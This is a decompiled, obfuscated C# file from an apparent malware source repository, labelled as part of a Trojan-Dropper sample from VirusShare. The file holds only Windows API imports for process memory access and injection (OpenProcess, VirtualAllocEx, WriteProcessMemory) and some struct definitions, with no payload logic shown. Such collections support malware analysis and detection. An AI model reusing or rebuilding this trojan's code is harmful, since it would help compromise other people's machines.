MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0006.cs

116 lines
4.1 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0008;
using System;
using System.Runtime.InteropServices;
namespace \u0008
{
internal static class \u0006
{
[DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)]
public static extern IntPtr \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] string obj2, [In] string obj3);
[DllImport("user32.dll", EntryPoint = "GetDlgItem")]
public static extern IntPtr \u000F([In] IntPtr obj0, [In] int obj1);
[DllImport("user32.dll", EntryPoint = "GetMenu")]
public static extern IntPtr \u000F([In] IntPtr obj0);
[DllImport("user32.dll", EntryPoint = "GetSubMenu", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr \u0010([In] IntPtr obj0, [In] int obj1);
[DllImport("user32.dll", EntryPoint = "GetMenuItemID")]
public static extern uint \u000F([In] IntPtr obj0, [In] int obj1);
[DllImport("user32.dll", EntryPoint = "EnableMenuItem")]
public static extern bool \u000F([In] IntPtr obj0, [In] uint obj1, [In] uint obj2);
[DllImport("user32.dll", EntryPoint = "RemoveMenu")]
public static extern bool \u0010([In] IntPtr obj0, [In] uint obj1, [In] uint obj2);
[DllImport("user32.dll", EntryPoint = "SendMessage", CharSet = CharSet.Auto)]
public static extern IntPtr \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] IntPtr obj3);
[DllImport("user32.dll", EntryPoint = "SendMessage", CharSet = CharSet.Auto)]
public static extern IntPtr \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] string obj3);
[DllImport("user32.dll", EntryPoint = "LockWindowUpdate")]
public static extern bool \u000F([In] IntPtr obj0);
[DllImport("user32.dll", EntryPoint = "GetWindowPlacement")]
public static extern bool \u000F([In] IntPtr obj0, [In] ref \u0006.\u0004 obj1);
[DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
public static extern IntPtr \u000F([In] uint obj0, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, [In] int obj2);
[DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
public static extern bool \u0010([In] IntPtr obj0);
[DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx", SetLastError = true)]
public static extern IntPtr \u000F(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] uint obj2,
[In] uint obj3,
[In] uint obj4);
[DllImport("kernel32.dll", EntryPoint = "VirtualFreeEx", SetLastError = true)]
public static extern bool \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] int obj2, [In] uint obj3);
[DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
public static extern bool \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] IntPtr obj2, [In] int obj3, [In] int obj4);
[DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")]
public static extern bool \u000F(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] ref \u0006.\u0001 obj2,
[In] int obj3,
[In] int obj4);
[DllImport("user32.dll", EntryPoint = "GetWindowThreadProcessId", SetLastError = true)]
public static extern uint \u000F([In] IntPtr obj0, out uint lpdwProcessId);
public struct \u0001
{
public uint \u0001;
public int \u0001;
public int \u0002;
public uint \u0002;
public uint \u0003;
public IntPtr \u0001;
public int \u0003;
public int \u0004;
}
public struct \u0002
{
private int \u0001;
private int \u0002;
private int \u0003;
private int \u0004;
}
public struct \u0003
{
private int \u0001;
private int \u0002;
}
public struct \u0004
{
public int \u0001;
public int \u0002;
public int \u0003;
public \u0006.\u0003 \u0001;
public \u0006.\u0003 \u0002;
public \u0006.\u0002 \u0001;
}
}
}